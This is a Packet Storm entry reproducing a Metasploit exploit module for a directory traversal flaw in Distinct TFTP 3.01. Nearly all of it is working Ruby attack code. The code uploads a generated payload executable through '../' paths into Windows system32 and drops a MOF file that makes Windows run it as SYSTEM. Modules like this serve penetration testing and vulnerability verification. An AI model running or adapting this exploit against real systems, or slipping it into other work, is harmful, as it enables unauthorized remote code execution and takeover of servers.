Distinct TFTP 3.01 Writable Directory Traversal Execution

2012-05-11T00:00:00
ID PACKETSTORM:112634
Type packetstorm
Reporter sinn3r
Modified 2012-05-11T00:00:00

Description

                                        
                                            `##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Rex::Proto::TFTP  
include Msf::Exploit::EXE  
include Msf::Exploit::WbemExec  
  
def initialize(info={})  
super(update_info(info,  
'Name' => "Distinct TFTP 3.01 Writable Directory Traversal Execution",  
'Description' => %q{  
This module exploits a vulnerability found in Distinct TFTP server. The  
software contains a directory traversal vulnerability that allows a remote  
attacker to write arbitrary file to the file system, which results in  
code execution under the context of 'SYSTEM'.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'modpr0be', #Initial discovery, PoC (Tom Gregory)  
'sinn3r' #Metasploit  
],  
'References' =>  
[  
['OSVDB', '80984'],  
['EDB', '18718'],  
['URL', 'http://www.spentera.com/advisories/2012/SPN-01-2012.pdf']  
],  
'Payload' =>  
{  
'BadChars' => "\x00",  
},  
'DefaultOptions' =>  
{  
'ExitFunction' => "none"  
},  
'Platform' => 'win',  
'Targets' =>  
[  
['Distinct TFTP 3.01 on Windows', {}]  
],  
'Privileged' => false,  
'DisclosureDate' => "Apr 8 2012",  
'DefaultTarget' => 0))  
  
register_options([  
OptInt.new('DEPTH', [false, "Levels to reach base directory",10]),  
OptAddress.new('RHOST', [true, "The remote TFTP server address"]),  
OptPort.new('RPORT', [true, "The remote TFTP server port", 69])  
], self.class)  
end  
  
def upload(filename, data)  
tftp_client = Rex::Proto::TFTP::Client.new(  
"LocalHost" => "0.0.0.0",  
"LocalPort" => 1025 + rand(0xffff-1025),  
"PeerHost" => datastore['RHOST'],  
"PeerPort" => datastore['RPORT'],  
"LocalFile" => "DATA:#{data}",  
"RemoteFile" => filename,  
"Mode" => "octet",  
"Context" => {'Msf' => self.framework, "MsfExploit" => self },  
"Action" => :upload  
)  
  
ret = tftp_client.send_write_request { |msg| print_status(msg) }  
while not tftp_client.complete  
select(nil, nil, nil, 1)  
tftp_client.stop  
end  
end  
  
def exploit  
peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"  
  
# Setup the necessary files to do the wbemexec trick  
exe_name = rand_text_alpha(rand(10)+5) + '.exe'  
exe = generate_payload_exe  
mof_name = rand_text_alpha(rand(10)+5) + '.mof'  
mof = generate_mof(mof_name, exe_name)  
  
# Configure how deep we want to traverse  
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']  
levels = "../" * depth  
  
# Upload the malicious executable to C:\Windows\System32\  
print_status("#{peer} - Uploading executable (#{exe.length.to_s} bytes)")  
upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)  
  
# Let the TFTP server idle a bit before sending another file  
select(nil, nil, nil, 1)  
  
# Upload the mof file  
print_status("#{peer} - Uploading .mof...")  
upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)  
end  
end  
`